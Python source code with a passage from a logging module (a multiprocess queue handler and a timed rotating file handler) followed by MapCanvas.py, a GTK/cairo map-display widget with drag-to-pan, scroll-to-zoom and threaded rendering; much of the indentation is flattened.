self._receive_thread.daemon = True
self._receive_thread.start()
def setFormatter(self, fmt):
super(MultiProcHandler, self).setFormatter(fmt)
self.sub_handler.setFormatter(fmt)
def _receive(self):
while not (self._is_closed and self.queue.empty()):
try:
record = self.queue.get()
self.sub_handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
self.queue.close()
self.queue.join_thread()
def _send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self._send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
if not self._is_closed:
self._is_closed = True
self._receive_thread.join(5.0) # Waits for receive queue to empty.
self.sub_handler.close()
super(MultiProcHandler, self).close()
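# Typical usage (illustrative): configure logging once in the parent process,
# then wrap the existing handlers so that records emitted in worker processes
# are funnelled through a single multiprocessing queue:
#
#     import logging
#     logging.basicConfig(filename='app.log', level=logging.INFO)
#     register_handler()  # wraps the root logger's handlers in MultiProcHandler
#     logging.info('safe to log from any process')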
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
    Handler for logging to a file, rotating the log file at certain timed
    intervals.
If backup_count is > 0, when rollover is done, no more than backup_count
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backup_count=0,
encoding=None, delay=False, utc=False):
self.when = when.upper()
self.backup_count = backup_count
self.utc = utc
self.base_filename = filename
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError(
"You must specify a day for weekly rollover "
"from 0 to 6 (0 is Monday): %s" % self.when
)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError(
"Invalid day specified for weekly rollover: %s" % self.when)
self.day_of_week = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
else:
raise ValueError(
"Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch)
self.current_filename = self._compute_fn()
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rollover_time = self.compute_rollover(t)
def compute_rollover(self, current_time):
"""
Work out the rollover time based on the specified time.
"""
result = current_time + self.interval
# If we are rolling over at midnight or weekly, then the interval
# is already known. What we need to figure out is WHEN the next
# interval is. In other words, if you are rolling over at midnight,
# then your base interval is 1 day, but you want to start that one day
# clock at midnight, not now. So, we have to fudge the rollover_time
# value in order to trigger the first rollover at the right time.
# After that, the regular interval will take care of the rest.
# Note that this code doesn't care about leap seconds.
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(current_time)
else:
t = time.localtime(current_time)
current_hour = t[3]
current_minute = t[4]
current_second = t[5]
# r is the number of seconds left between now and midnight
r = _MIDNIGHT - (
(current_hour * 60 + current_minute) * 60 + current_second)
result = current_time + r
# If we are rolling over on a certain day, add in the number of
# days until the next rollover, but offset by 1 since we just
# calculated the time until the next day starts. There are three
# cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e.,
# today is day 2 (Wednesday) and rollover is on
# day 6 (Sunday). Days to next rollover is simply
# 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e.,
# today is day 5 (Saturday) and rollover is on day 3
# (Thursday). Days to rollover is 6 - 5 + 3, or 4.
# In this case, it's the number of days left in the current
# week (1) plus the number of days in the next week until
# the rollover day (3).
# The calculations described in 2) and 3) above need to have a day
# added. This is because the above time calculation takes us to
# midnight on this day, i.e. the start of the next day.
if self.when.startswith('W'):
day = t[6] # 0 is Monday
if day != self.day_of_week:
if day < self.day_of_week:
daysToWait = self.day_of_week - day
else:
daysToWait = 6 - day + self.day_of_week + 1
new_rollover_time = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dest_now = t[-1]
dest_rollover_time = time.localtime(new_rollover_time)[
-1]
if dest_now != dest_rollover_time:
if not dest_now:
addend = -3600
else:
addend = 3600
new_rollover_time += addend
result = new_rollover_time
return result
def should_rollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
if self.current_filename != self._compute_fn():
return True
# print "No need to rollover: %d, %d" % (t, self.rollover_time)
        return 0
    # logging.handlers.BaseRotatingHandler calls the camelCase name, so keep an
    # alias to ensure the rollover check above actually runs on emit().
    shouldRollover = should_rollover
def _compute_fn(self):
return self.base_filename + '.' + \
time.strftime(self.suffix, time.localtime())
def get_files_to_delete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dir_name, base_name = os.path.split(self.base_filename)
file_names = os.listdir(dir_name)
result = []
prefix = base_name + "."
plen = len(prefix)
for fileName in file_names:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dir_name, fileName))
result.sort()
if len(result) < self.backup_count:
result = []
else:
result = result[:len(result) - self.backup_count]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the
filename when the rollover happens. However, you want the file to be
named for the start of the interval, not the current time.
If there is a backup count, then we have to get a list of matching
filenames, sort them and remove the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
current_time = int(time.time())
dest_now = time.localtime(current_time)[-1]
t = self.rollover_time - self.interval
if self.utc:
time_tuple = time.gmtime(t)
else:
time_tuple = time.localtime(t)
dstThen = time_tuple[-1]
if dest_now != dstThen:
if dest_now:
addend = 3600
else:
addend = -3600
time_tuple = time.localtime(t + addend)
self.current_filename = self._compute_fn()
if self.backup_count > 0:
for s in self.get_files_to_delete():
os.remove(s)
# print "%s -> %s" % (self.base_filename, dfn)
self.stream = self._open()
new_rollover_time = self.compute_rollover(current_time)
while new_rollover_time <= current_time:
new_rollover_time = new_rollover_time + self.interval
# If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith(
'W')) and not self.utc:
dest_rollover_time = time.localtime(new_rollover_time)[-1]
if dest_now != dest_rollover_time:
if not dest_now:
addend = -3600
else:
addend = 3600
new_rollover_time += addend
self.rollover_time = new_rollover_time
def _open(self):
if self.encoding is None:
stream = open(self.current_filename, self.mode)
else:
stream = codecs.open(self.current_filename, self.mode,
self.encoding)
if os.path.exists(self.base_filename):
try:
os.remove(self.base_filename)
except OSError:
pass
try:
os.symlink(self.current_filename, self.base_filename)
except OSError:
pass
return stream
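# Illustrative usage of the handler above (file name, interval and format are
# examples): rotate every hour, keep 24 backups, and expose the active file via
# the symlink that _open() creates at the base filename.
if __name__ == '__main__':
    demo_logger = logging.getLogger('rotation-demo')
    demo_logger.setLevel(logging.INFO)
    handler = TimedRotatingFileHandler('app.log', when='h', interval=1, backup_count=24)
    handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
    demo_logger.addHandler(handler)
    demo_logger.info('hello from the timed rotating handler')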
|
MapCanvas.py
|
#!/usr/bin/env python3
"""
Project: PyGTK Map Canvas
Title: MapCanvas & UITool Classes
Function: Provides GTK widget for displaying a map.
Author: Ben Knisley [[email protected]]
Created: 8 December, 2019
"""
## Import Python built-ins
import threading
import time
## Import PyGtk modules
import gi
import cairo
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, Gio, GObject, GLib
## Import PyMapKit module
import PyMapKit
class UITool(GObject.GObject):
"""
    A tool for MapCanvas providing click-to-pan and scroll-to-zoom functionality.
"""
def __init__(self):
self.parent = None
def activate(self, parent):
self.parent = parent
self.parent.connect("left-drag-update", self.left_drag)
self.parent.connect("scroll-up", self.scroll_up)
self.parent.connect("scroll-down", self.scroll_down)
def left_drag(self, caller, x_change, y_change):
""" """
## Calculate new pixel point from drag distance
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.parent.width, self.parent.height)
cr = cairo.Context(temp_surface)
cr.save()
cr.translate(int(x_change), int(y_change))
cr.set_source_surface(self.parent.rendered_map)
cr.paint()
cr.restore()
center_x, center_y = self.parent.get_canvas_center()
projx, projy = self.parent.pix2proj((center_x - x_change), (center_y + y_change))
self.parent.set_proj_coordinate(projx, projy)
self.parent.rendered_map = temp_surface
        ## Call for the canvas to be redrawn
self.parent.call_redraw(self)
## Call for map to be rerendered
self.parent.call_rerender(self)
def scroll_up(self, caller):
##
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.parent.width, self.parent.height)
cr = cairo.Context(temp_surface)
cr.save()
x_w = -((self.parent.width * 1.1) - self.parent.width) / 2
x_h = -((self.parent.height * 1.1) - self.parent.height) / 2
cr.translate(x_w, x_h)
cr.scale(1.1, 1.1)
cr.set_source_surface(self.parent.rendered_map)
cr.paint()
cr.restore()
self.parent.rendered_map = temp_surface
## Call redraw
self.parent.call_redraw(self)
self.parent.set_scale( self.parent.get_scale() / 1.1 )
self.parent.call_rerender(self)
##
self.parent.call_redraw(self)
def scroll_down(self, caller):
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.parent.width, self.parent.height)
cr = cairo.Context(temp_surface)
cr.save()
x_w = -((self.parent.width / 1.1) - self.parent.width) / 2
x_h = -((self.parent.height / 1.1) - self.parent.height) / 2
cr.translate(int(x_w), int(x_h))
cr.scale(1/1.1, 1/1.1)
cr.set_source_surface(self.parent.rendered_map)
cr.paint()
cr.restore()
self.parent.rendered_map = temp_surface
## Call redraw
self.parent.call_redraw(self)
self.parent.call_rerender(self)
self.parent.set_scale( self.parent.get_scale() * 1.1 )
##
self.parent.call_redraw(self)
def middle_click(self, caller, x,y):
self.selected = []
self.parent.call_redraw(self)
def draw(self, cr):
""" """
pass
class _SignalManager(GObject.GObject):
"""
    Class that receives raw GTK events on behalf of MapCanvas and re-emits them
    as higher-level map signals (clicks, drags and scrolls).
"""
def __init__(self, parent):
""" """
GObject.GObject.__init__(self)
self.map = parent
## Add capability to detect mouse events
self.map.add_events(Gdk.EventMask.BUTTON_PRESS_MASK)
self.map.add_events(Gdk.EventMask.BUTTON_RELEASE_MASK)
self.map.add_events(Gdk.EventMask.BUTTON1_MOTION_MASK)
self.map.add_events(Gdk.EventMask.BUTTON2_MOTION_MASK)
self.map.add_events(Gdk.EventMask.BUTTON3_MOTION_MASK)
self.map.add_events(Gdk.EventMask.SCROLL_MASK)
        ## Connect native GTK event signals to the handlers below
self.map.connect("scroll-event", self.scroll)
self.map.connect("button-press-event", self.buttonPress)
self.map.connect("button-release-event", self.buttonRelease)
self.map.connect("motion-notify-event", self.mouseDrag)
## Create custom signals
GObject.signal_new("layer-added", self.map, GObject.SIGNAL_RUN_FIRST, None, (object,))
GObject.signal_new("scroll-up", self.map, GObject.SIGNAL_RUN_FIRST, None, ())
GObject.signal_new("scroll-down", self.map, GObject.SIGNAL_RUN_FIRST, None, ())
GObject.signal_new("left-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("double-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("left-drag-start", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("left-drag-update", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("left-drag-end", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("middle-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("middle-drag-start", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("middle-drag-update", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("middle-drag-end", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("right-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("right-drag-start", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("right-drag-update", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("right-drag-end", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
## Define public mouse button trackers
self.click_time = 0
self.left_active = False
self.left_init_position = (None, None)
self.left_updated_position = (None, None)
self.middle_active = False
self.middle_init_position = (None, None)
self.middle_updated_position = (None, None)
self.right_active = False
self.right_init_position = (None, None)
self.right_updated_position = (None, None)
def buttonPress(self, caller, click):
if click.button == 1: ## Left click
self.left_active = True
self.left_init_position = (click.x, click.y)
elif click.button == 2: ## Middle click
self.middle_active = True
self.middle_init_position = (click.x, click.y)
else: ## Right click
self.right_active = True
self.right_init_position = (click.x, click.y)
def buttonRelease(self, caller, click):
if click.button == 1: ## Left click
            ## Emit double-click, left-click, or left-drag-end as appropriate
if (time.time() - self.click_time) < 0.25:
self.map.emit('double-click', int(click.x), int(click.y))
elif (click.x, click.y) == self.left_init_position:
self.map.emit('left-click', int(click.x), int(click.y))
else:
self.map.emit('left-drag-end', int(click.x), int(click.y))
## Reset trackers
self.click_time = time.time()
self.left_active = False
self.left_init_position = (None, None)
self.left_updated_position = (None, None)
elif click.button == 2: ## Middle click
            ## Emit middle-click or middle-drag-end
if (click.x, click.y) == self.middle_init_position:
self.map.emit('middle-click', int(click.x), int(click.y))
else:
self.map.emit('middle-drag-end', int(click.x), int(click.y))
## Reset
self.middle_active = False
self.middle_init_position = (None, None)
self.middle_updated_position = (None, None)
else: ## Right click
            ## Emit right-click or right-drag-end
if (click.x, click.y) == self.right_init_position:
self.map.emit('right-click', int(click.x), int(click.y))
else:
self.map.emit('right-drag-end', int(click.x), int(click.y))
## Reset
self.right_active = False
self.right_init_position = (None, None)
self.right_updated_position = (None, None)
def mouseDrag(self, caller, move):
if self.left_active:
if self.left_updated_position == (None, None):
self.map.emit('left-drag-start', int(move.x), int(move.y))
self.left_updated_position = self.left_init_position
init_x, init_y = self.left_updated_position
self.map.emit('left-drag-update', move.x-init_x, move.y-init_y)
## Set drag origin point
self.left_updated_position = (move.x, move.y)
if self.middle_active:
if self.middle_updated_position == (None, None):
self.map.emit('middle-drag-start', int(move.x), int(move.y))
self.middle_updated_position = self.middle_init_position
init_x, init_y = self.middle_updated_position
self.map.emit('middle-drag-update', move.x-init_x, move.y-init_y)
## Set drag origin point
self.middle_updated_position = (move.x, move.y)
if self.right_active:
if self.right_updated_position == (None, None):
self.map.emit('right-drag-start', int(move.x), int(move.y))
self.right_updated_position = self.right_init_position
init_x, init_y = self.right_updated_position
self.map.emit('right-drag-update', move.x-init_x, move.y-init_y)
## Set drag origin point
self.right_updated_position = (move.x, move.y)
def scroll(self, caller, scroll):
""" """
if int(scroll.direction) == 0:
self.map.emit("scroll-up")
else:
self.map.emit("scroll-down")
class MapCanvas(Gtk.DrawingArea, PyMapKit.Map):
"""
A widget that renders a map.
"""
def __init__(self, add_UITool=True):
""" """
## Implement inheritance from GObject, DrawingArea, and PyMapKit.Map
GObject.GObject.__init__(self)
Gtk.DrawingArea.__init__(self)
PyMapKit.Map.__init__(self)
## Create _SignalManager Object to handle map signals for us
self.signal_man = _SignalManager(self)
## Connect basic widget signals
self.connect("configure_event", self.refresh_window)
self.connect("size-allocate", self.refresh_window)
self.connect("draw", self.draw)
## Set map attributes
self.set_background_color('black')
## Add a list to hold tools
self.tools = []
        ## If the add_UITool flag is true, add a default UITool
if add_UITool:
self.add_tool(UITool())
## Create background rendering thread variables
self.rendered_map = None
self.render_thread = None
self.is_rendering = False
self.map_updated = True
        ## Track the active layer (none selected yet)
self.active_layer_index = None
""" Tool Functions """
def add_tool(self, new_tool):
new_tool.activate(self)
self.tools.append(new_tool)
def remove_tool(self, tool):
tool.deactivate()
self.tools.remove(tool)
""" Overriding and extending Map methods """
def add_layer(self, new_map_layer, index=-1):
""" """
#@ Extend PyMapKit.add_layer
super().add_layer(new_map_layer, index)
##
self.emit("layer-added", new_map_layer)
self.call_rerender(self)
self.call_redraw(self)
""" Slots Methods """
def refresh_window(self, caller, data):
""" """
## When widget is first created: queue rendering
self.call_rerender(self)
self.call_redraw(self)
""" Map Rendering functions """
def call_rerender(self, caller):
""" Hard ask map to rerender """
self.map_updated = True
GObject.idle_add(self.start_render_thread)
    def start_render_thread(self):
        """ Runs render_map in a background thread if one is not already running. """
        if self.map_updated:
            if not self.is_rendering:
                self.render_thread = threading.Thread(target=self.render_map)
                self.render_thread.daemon = False  ## Explicitly non-daemonic
                self.render_thread.start()
def render_map(self):
""" Renders map to self.rendered_map """
self.map_updated = False
self.is_rendering = True
        ## Render into an off-screen surface sized to the widget
        temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.get_allocated_width(), self.get_allocated_height())
        cr = cairo.Context(temp_surface)
        self.render(cr)
        ## Publish the surface only if no new update arrived while rendering;
        ## otherwise render again with the latest map state
        if not self.map_updated:
            self.rendered_map = temp_surface
        else:
            self.render_map()
self.map_updated = False
self.is_rendering = False
self.call_redraw(self)
""" Widget Drawing functions """
def call_redraw(self, caller):
""" Asks canvas to redraw itself """
self.queue_draw()
def draw(self, caller, cr):
""" """
## Set match size matches widget size
self.set_size(self.get_allocated_width(), self.get_allocated_height())
self.renderer.draw_background(cr, self._background_color)
        ## If a rendered surface is available, paint it onto the widget
if self.rendered_map:
cr.set_source_surface(self.rendered_map)
cr.paint()
self.render_thread.join(0)
for tool in self.tools:
tool.draw(cr)
        ## Queue another draw, keeping the canvas continuously refreshed
self.call_redraw(self)
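## ---------------------------------------------------------------------------
## Hypothetical usage sketch (not part of the original module): embeds a
## MapCanvas in a bare Gtk window so the widget can be tried stand-alone.
## Only methods and signals defined above are used; adding layers is left
## commented out because it depends on which PyMapKit layer types are available.
if __name__ == '__main__':
    window = Gtk.Window(title="MapCanvas demo")
    window.set_default_size(800, 600)
    window.connect("destroy", Gtk.main_quit)
    canvas = MapCanvas()  ## Default UITool gives drag-to-pan / scroll-to-zoom
    canvas.connect("left-click", lambda map_, x, y: print("clicked at", x, y))
    ## canvas.add_layer(some_pymapkit_layer)
    window.add(canvas)
    window.show_all()
    Gtk.main()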